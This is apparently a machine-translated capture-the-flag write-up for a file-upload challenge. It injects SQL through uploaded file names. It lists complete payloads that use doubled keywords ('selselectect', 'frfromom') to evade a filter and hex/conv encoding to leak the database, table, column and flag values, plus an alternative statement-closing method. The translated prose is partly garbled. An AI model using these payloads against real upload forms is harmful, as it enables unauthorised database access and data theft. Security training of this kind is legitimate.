practice:
Use the file name sql injection
Ideas:
Speculate background insert insert statement:
insert into 表名('filename',...) values('你上传的文件名',...);
The following statements are implanted structure:
文件名'+(selselectect conv(substr(hex(database()),1,12),16,10))+'.jpg
After splicing sql statement is:
...values('文件名'+(selselectect conv(substr(hex(database()),1,12),16,10))+'.jpg',...);
CONV (n, from_radix, to_radix): to_radix for n-ary to binary from from_radix
substr (str, start, length): str is the length from the start split length
hex (str): str will turn into hexadecimal
Little doubt & details:
select, from the filter, bypassing the written bis
Why not just adopt
sselectelect database()implanting:Part injection Echo:
'+(selselectect dAtabase())+'.jpg => 0
'+(selecselectt substr(dAtabase(),1,12))+'.jpg => 0
'+(selecselectt substr(hex(dAtabase()),1,12))+'.jpg => 7765625
The third sentence code should echo '7765625f7570', encountered 'f' lead to cut-off, so it is necessary to decimal format output conv
substr in length limit: not limit the length of the return value will result in too large, the system using scientific notation (XX E XXXXX) FIG.
Topic restrictions
- Echo letters can not appear --- "Coded Decimal
- To make the statement after the injection of the correct closed --- "guess sentence structure, proper closure
- Preventing the echo data is too large so that the program returns the result of scientific notation --- type "echo length limit
step
Upload file names use injection statements are implanted in the upload file, substr interception position of self-adjustment to the reader until the full name
1. 库名
file_name' +(selselectect conv(substr(hex(database()),1,12),16,10))+ '.jpg
# 得到库名:web_upload
2. 表名
file_name'+(seleselectct+conv(substr(hex((selselectect table_name frfromom information_schema.tables where table_schema = 'web_upload' limit 1,1)),1,12),16,10))+'.jpg
# 得到表名:hello_flag_is_here
3. 字段
file_name'+(seleselectct+conv(substr(hex((selselectect COLUMN_NAME frfromom information_schema.COLUMNS where TABLE_NAME = 'hello_flag_is_here' limit 1,1)),1,12),16,10))+'.jpg
# 得到字段名:i_am_flag
4. 获得数据
file_name'+(seleselectct+CONV(substr(hex((seselectlect i_am_flag frfromom hello_flag_is_here limit 0,1)),13,12),16,10))+'.jpg
# 得到flag:!!_@m_Th.e_F!lagOther approaches (simpler, requiring brain Cave):
If the structure of the table to guess correctly, will soon be able to solve wp This question, a reference to a dalao in written structure:
(filename.jpg,uid,uid)
Sentence structure
When uploading files, the site will echo uid to us, we must first upload a file, get uid, find the page jump too quickly can capture
We construct(filename,'uid','uid'),((database()),'uid','uid')#.jpg ','uid','uid');
Statement after the stitching is(filename,'uid','uid'),((database()),'uid','uid')
Corresponding echo is our database filename and file upload (), indicating a successful injection
step
We injected into the formation of this statement, uid-replaceable
1. 库名
filename','uid','uid'),((database()),'uid','uid')#.jpg
# 例:filename','1661','1661'),((database()),'1661','1661')#.jpg
2. 表名
filename','uid','uid'),((selselectect group_concat(table_name) frfromom information_schema.tables where table_schema = 'web_upload'),'uid','uid')#.jpg
#'--------------------------------分割行
3. 字段名
filename','uid','uid'),((selselectect group_concat(column_name) frfromom information_schema.columns where table_name = 'hello_flag_is_here'),'uid','uid')#.jpg
#'--------------------------------分割行
4. 获得数据
filename','uid','uid'),((selselectect i_am_flag frfromom hello_flag_is_here),'uid','uid')#.jpg
Reference connection:
https://www.cnblogs.com/sharpff/p/10728498.html
https://blog.csdn.net/qq_42181428/article/details/89345094#upload_168